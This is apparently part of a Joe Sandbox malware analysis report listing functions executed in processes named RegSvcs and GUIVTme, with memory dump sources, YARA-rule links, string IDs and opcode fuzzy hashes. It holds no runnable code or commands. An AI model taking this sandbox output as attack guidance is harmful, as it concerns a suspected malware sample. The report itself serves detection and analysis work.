                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05D3AF18 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 05D3AF7E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: e253d79135596c78962c549aa482c7e7b3d662f034c9ea8380753f007e7e196f
                                                                                        • Instruction ID: a4f05dd3dde7fa22fb34a2b1bd99830363ce0be62346358bcea029e7a59abfdc
                                                                                        • Opcode Fuzzy Hash: e253d79135596c78962c549aa482c7e7b3d662f034c9ea8380753f007e7e196f
                                                                                        • Instruction Fuzzy Hash: 4111E0B5D047498FCB10DF9AC444ADEFBF5EF88324F10842AE469A7210D379A545CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00E0D01C Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2880874753.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_e0d000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2079f5cb4115b07a3c2f98207abf117f7dd6bac0b828ce2e391c08158e038fa5
                                                                                        • Instruction ID: 4264615849dba07012dc3fa4310b32f6292a914cf635cf810bab46e223366690
                                                                                        • Opcode Fuzzy Hash: 2079f5cb4115b07a3c2f98207abf117f7dd6bac0b828ce2e391c08158e038fa5
                                                                                        • Instruction Fuzzy Hash: C821F271608200DFDB14DF54D984B26BBA6EB84318F20C569D84E5B296C33AD887CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00E0D005 Relevance: .1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2880874753.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_e0d000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 95ad4745f44ecc2daaf25d5fa06b8e718b2b02ee0e169172c01d469af2599ce1
                                                                                        • Instruction ID: a09051e606c65a65067a9dda346b4b4d7f5621bfba1858ff9f82c2c28fe02721
                                                                                        • Opcode Fuzzy Hash: 95ad4745f44ecc2daaf25d5fa06b8e718b2b02ee0e169172c01d469af2599ce1
                                                                                        • Instruction Fuzzy Hash: 8821837550D3808FC702CF24D994715BF71EB46314F28C5DAD8498F6A7C33A984ACB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Executed Functions

                                                                                        Function 00DE1230 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.1832133364.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_de0000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: tP^q
                                                                                        • API String ID: 0-2862610199
                                                                                        • Opcode ID: 7c9a42a71369288b97ff948f56a8d8da2a13aa30d7f5adca4a17a326d6ac4cbd
                                                                                        • Instruction ID: 4da0abe97e682c9fc5c19f0c8a0fb657fa25e38d5be69dee0a93415758de2670
                                                                                        • Opcode Fuzzy Hash: 7c9a42a71369288b97ff948f56a8d8da2a13aa30d7f5adca4a17a326d6ac4cbd
                                                                                        • Instruction Fuzzy Hash: 223137747406108FCB69AF38C55881D7BE2AF8A71536608B8E406CF3B2DE35DC42CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00DE1240 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.1832133364.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_de0000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: tP^q
                                                                                        • API String ID: 0-2862610199
                                                                                        • Opcode ID: 49ada0edce867ef050ffb557b2dcce1416bff223bc5664e04b44ef87f7d93f74
                                                                                        • Instruction ID: 996d1e9a12ab6136c1ec0d199ce5a959f965ef741efc96e04ac2ec5904d4335a
                                                                                        • Opcode Fuzzy Hash: 49ada0edce867ef050ffb557b2dcce1416bff223bc5664e04b44ef87f7d93f74
                                                                                        • Instruction Fuzzy Hash: 512136747406108FCB59AF38C15881D7BE2AF8AB1536508B8E506CF375DE36DC42CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00DE1AE0 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.1832133364.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_de0000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8bq
                                                                                        • API String ID: 0-187764589
                                                                                        • Opcode ID: a72b91f6afb1bae699fc915dcb3c1bdd469ba225925a9349f57fd95d8dc1bd4a
                                                                                        • Instruction ID: 40666704659fae9c740cfafdcd54f72e404248328dd86ab243bdfd8445069040
                                                                                        • Opcode Fuzzy Hash: a72b91f6afb1bae699fc915dcb3c1bdd469ba225925a9349f57fd95d8dc1bd4a
                                                                                        • Instruction Fuzzy Hash: 2D11B134B001045FC705EF79E550AAE7BB6EF85304F1040A9C2099B395EE749E06CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00DE1340 Relevance: .5, Instructions: 526COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.1832133364.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_de0000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 52d0b8dbaf17653e93c7f11d496a88994a609ee28f890daf65c4333e98fe4a9f
                                                                                        • Instruction ID: 70aa079c510ddf509dcdbfd49ec96dac0c0af2569a20280f04249ea18aead6fe
                                                                                        • Opcode Fuzzy Hash: 52d0b8dbaf17653e93c7f11d496a88994a609ee28f890daf65c4333e98fe4a9f
                                                                                        • Instruction Fuzzy Hash: F4227F34B00242CFD714EF35D990A6A77B2FBC4359B248929C45A8B798EF75EC42CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00DE0BC0 Relevance: .3, Instructions: 338COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.1832133364.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_de0000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b3d42b4b1de27bf28895c767145042351a846cc49f8530b1a851a6f3fcbf5ada
                                                                                        • Instruction ID: 5e9fbd3dddaf7900ac961af4e68cdfd01fe3539df3ac99caba8cecbcdf565d56
                                                                                        • Opcode Fuzzy Hash: b3d42b4b1de27bf28895c767145042351a846cc49f8530b1a851a6f3fcbf5ada
                                                                                        • Instruction Fuzzy Hash: CC81A335A00341CFCB16AFB5C91869ABBF2EF88310F148569D4569B764DFB1EC85CB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00DE1C00 Relevance: .0, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.1832133364.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_de0000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 56e8d2b3049eb573788e9ec201bfb856052e1532960a47f03a77287f9254621b
                                                                                        • Instruction ID: 7098b1418db48371e50771d142aa1dae1e4b5ef32049aba96aaaf770c00d4c36
                                                                                        • Opcode Fuzzy Hash: 56e8d2b3049eb573788e9ec201bfb856052e1532960a47f03a77287f9254621b
                                                                                        • Instruction Fuzzy Hash: CA118276E002459FCB01DFB4D9449AEBBB1FF8920071186AAE519DB221EBB09905CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00DE1C10 Relevance: .0, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.1832133364.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_de0000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: addc55819d575e48afe740efa236e6b7ea57ce36665052836dd6eec36e438a36
                                                                                        • Instruction ID: 3153cee09505be62ae41ed3e6a6813b7754749ba3980bf16df0e63931111dfe3
                                                                                        • Opcode Fuzzy Hash: addc55819d575e48afe740efa236e6b7ea57ce36665052836dd6eec36e438a36
                                                                                        • Instruction Fuzzy Hash: 22017575E002059FCB40EFB4D9449AFFBF5FF89310710866AE51997225EB70A915CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00DE0898 Relevance: .0, Instructions: 23COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.1832133364.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_de0000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b50b3b0c6d0d480e71f8dbd662e5757c6dd910f94265ac1035a7e56cb7c9221b
                                                                                        • Instruction ID: b64b8dee594993b20b9f8e84a31188972213438c0a7359416107a7b7625b3f0e
                                                                                        • Opcode Fuzzy Hash: b50b3b0c6d0d480e71f8dbd662e5757c6dd910f94265ac1035a7e56cb7c9221b
                                                                                        • Instruction Fuzzy Hash: F5E09275C06298AECF11DFB854461DEBFF0AD05200B1045AAC45AE3201E2B0860ACFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00DE0F9D Relevance: .0, Instructions: 23COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.1832133364.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_de0000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ea815cc2eb9ed6ba5151f6458082a2b39e7719c1fbdc2c53d1eddda73400ca06
                                                                                        • Instruction ID: 993bcd19bb6dcc694013e114201fa19fc2e9e3ab60f2c0c5a59e5f0bc864d309
                                                                                        • Opcode Fuzzy Hash: ea815cc2eb9ed6ba5151f6458082a2b39e7719c1fbdc2c53d1eddda73400ca06
                                                                                        • Instruction Fuzzy Hash: 11F01578A00346CFDB24EB65C558BAD7BB0AB48704F290858D412AB3A0CBB48C84CB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00DE08A8 Relevance: .0, Instructions: 17COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.1832133364.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_de0000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 53b096e36d679fabb356dfdfe8de6a2cf0c34675bf13f2f45bc1cebfdbe47cab
                                                                                        • Instruction ID: 57ae44e9740c3f24e0bcd558546d7e2ff59b3140b2a37f4026166624523834a5
                                                                                        • Opcode Fuzzy Hash: 53b096e36d679fabb356dfdfe8de6a2cf0c34675bf13f2f45bc1cebfdbe47cab
                                                                                        • Instruction Fuzzy Hash: 8ED067B1D01219AF8B40EFB999051DEBBF8FE09650B104566D959E3200E6709A10CBE1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Executed Functions

                                                                                        Function 02C31230 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.1912263114.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_2c30000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: tP^q
                                                                                        • API String ID: 0-2862610199
                                                                                        • Opcode ID: 685b8bbab590067942a21b90ce50bf0e0c2320bcdc9b71d65484053a920af2f7
                                                                                        • Instruction ID: 8a1cbcaf776024ac3c958021b8a4560927e02d3064869c7efef760ab79b82e7b
                                                                                        • Opcode Fuzzy Hash: 685b8bbab590067942a21b90ce50bf0e0c2320bcdc9b71d65484053a920af2f7
                                                                                        • Instruction Fuzzy Hash: 7E3124717406108FCB59AB38C55891D3BE2AF8A71936508A8E50ACF375DE35DC82CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C31240 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.1912263114.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_2c30000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: tP^q
                                                                                        • API String ID: 0-2862610199
                                                                                        • Opcode ID: fd34dec5ffa52ccf68f5baa55bb1b8e088e382eac4232028e52d71e04270a1ab
                                                                                        • Instruction ID: f3ae5dbc20685d338e3a72fc219f31c4f3b2c8502cddb49e321c945b9fc585fd
                                                                                        • Opcode Fuzzy Hash: fd34dec5ffa52ccf68f5baa55bb1b8e088e382eac4232028e52d71e04270a1ab
                                                                                        • Instruction Fuzzy Hash: B92116757406108FCB59AB38C55881D7BE2AF8AB1936508B8E50ACF375DE36DC42CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C31AE0 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.1912263114.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_2c30000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8bq
                                                                                        • API String ID: 0-187764589
                                                                                        • Opcode ID: 20657e34046b6e6d094cde2f45eed2b4393f396e1044a8d4c004da504236982c
                                                                                        • Instruction ID: 7980ffe7bd2bcc632554f23c30c0df362d5d18aa979c7cb5d0d38627f1e2bc33
                                                                                        • Opcode Fuzzy Hash: 20657e34046b6e6d094cde2f45eed2b4393f396e1044a8d4c004da504236982c
                                                                                        • Instruction Fuzzy Hash: 8D11D071B00218AFC748EBB8D454BDD7BE6EB88344F108068C509A7384EF348E06CB86
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C31340 Relevance: .5, Instructions: 512COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.1912263114.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_2c30000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d3f7ade442b09211c3a882d6790b7c131624bad71da318ca0766249f19b2b110
                                                                                        • Instruction ID: c5469371e30946a3790d3ad749cf85f5b4d099774ed974ae4eb34a5e4e1cea66
                                                                                        • Opcode Fuzzy Hash: d3f7ade442b09211c3a882d6790b7c131624bad71da318ca0766249f19b2b110
                                                                                        • Instruction Fuzzy Hash: 8F224C31B04602CFD719EFB5D49066A73B2FBC8355B14893DC45A8B388EB75E882CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C30BC0 Relevance: .3, Instructions: 335COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.1912263114.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_2c30000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 353f597cd04d77bb723587a67c213b71b1ddd0f9ee09d59488f8f378004f6962
                                                                                        • Instruction ID: 0d7c95f975a6caf54a174a4a65e00f8aad7cbdf8ad5c97d0564b0e8435982d72
                                                                                        • Opcode Fuzzy Hash: 353f597cd04d77bb723587a67c213b71b1ddd0f9ee09d59488f8f378004f6962
                                                                                        • Instruction Fuzzy Hash: B781C635A00345CFCB2A9FB4C4586A9BBF2FF88310F048969D4569B768DB75AC85CB80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C31C00 Relevance: .0, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.1912263114.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_2c30000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ae72b609f8cb1dc2b9b1d6a2b0858944f0dea4bd779185e520070dd71eb2d5bc
                                                                                        • Instruction ID: acdde4c4ddb83939db816b24d81a5fe267d56aa7c007ec21fe9400b288eef49d
                                                                                        • Opcode Fuzzy Hash: ae72b609f8cb1dc2b9b1d6a2b0858944f0dea4bd779185e520070dd71eb2d5bc
                                                                                        • Instruction Fuzzy Hash: 73115B76E002469FCB41EFB4D984AABBBF1FF89300B10866AE51997225E7749911CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C31C10 Relevance: .0, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.1912263114.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_2c30000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 69741192b6c7fd0554a5107685b786e5296fdba4cc12a0b5565983d140f6dc98
                                                                                        • Instruction ID: e3446e09a8b71882703ef09818c00b465632ee8356b142ad97784615d958f00a
                                                                                        • Opcode Fuzzy Hash: 69741192b6c7fd0554a5107685b786e5296fdba4cc12a0b5565983d140f6dc98
                                                                                        • Instruction Fuzzy Hash: 8F015E76E002069FCB40EFB4D8449ABFBF5FF89310710866AE51997324E770A955CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C30F9D Relevance: .0, Instructions: 23COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.1912263114.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_2c30000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 83ad583a420a128b948b1f7b34982e3b2b1bde2d69a4629c66420fd30b603043
                                                                                        • Instruction ID: a33cede2d051cc8a6f8cbe24a1bbfb95f7caae96ab808989f67926b110787474
                                                                                        • Opcode Fuzzy Hash: 83ad583a420a128b948b1f7b34982e3b2b1bde2d69a4629c66420fd30b603043
                                                                                        • Instruction Fuzzy Hash: 83F01C75A00315CFDB25EBA4C5587AD7BF0AB48708F180868D416EB260DBB48D84CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C30898 Relevance: .0, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.1912263114.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_2c30000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6dc942df67aa483f597f4efe142f978a2c2e8a8d5a3c24d2f2887fa6c4f7fc53
                                                                                        • Instruction ID: 2396d7e57ea0f427cffc2ebaca3e8ab3000884e3f89704a0441b37627621f444
                                                                                        • Opcode Fuzzy Hash: 6dc942df67aa483f597f4efe142f978a2c2e8a8d5a3c24d2f2887fa6c4f7fc53
                                                                                        • Instruction Fuzzy Hash: 08E04F72D01219AFCB40EFFDA5095EA7FF4FE08610B400575D619E7604E7709640CBD2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C308A8 Relevance: .0, Instructions: 17COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000013.00000002.1912263114.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_19_2_2c30000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5d67e505f411a9bc7355f6912447f1259eeea765849cfe290bda30c99dfd7fda
                                                                                        • Instruction ID: 241102a33be528fe2da000b50c91601b4a08227a59c732345e074ac1e26f025b
                                                                                        • Opcode Fuzzy Hash: 5d67e505f411a9bc7355f6912447f1259eeea765849cfe290bda30c99dfd7fda
                                                                                        • Instruction Fuzzy Hash: D6D067B1D05229AF8B50EFFD99051DEBBF8EE09250B104576D919E7204E6745A10CBD1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%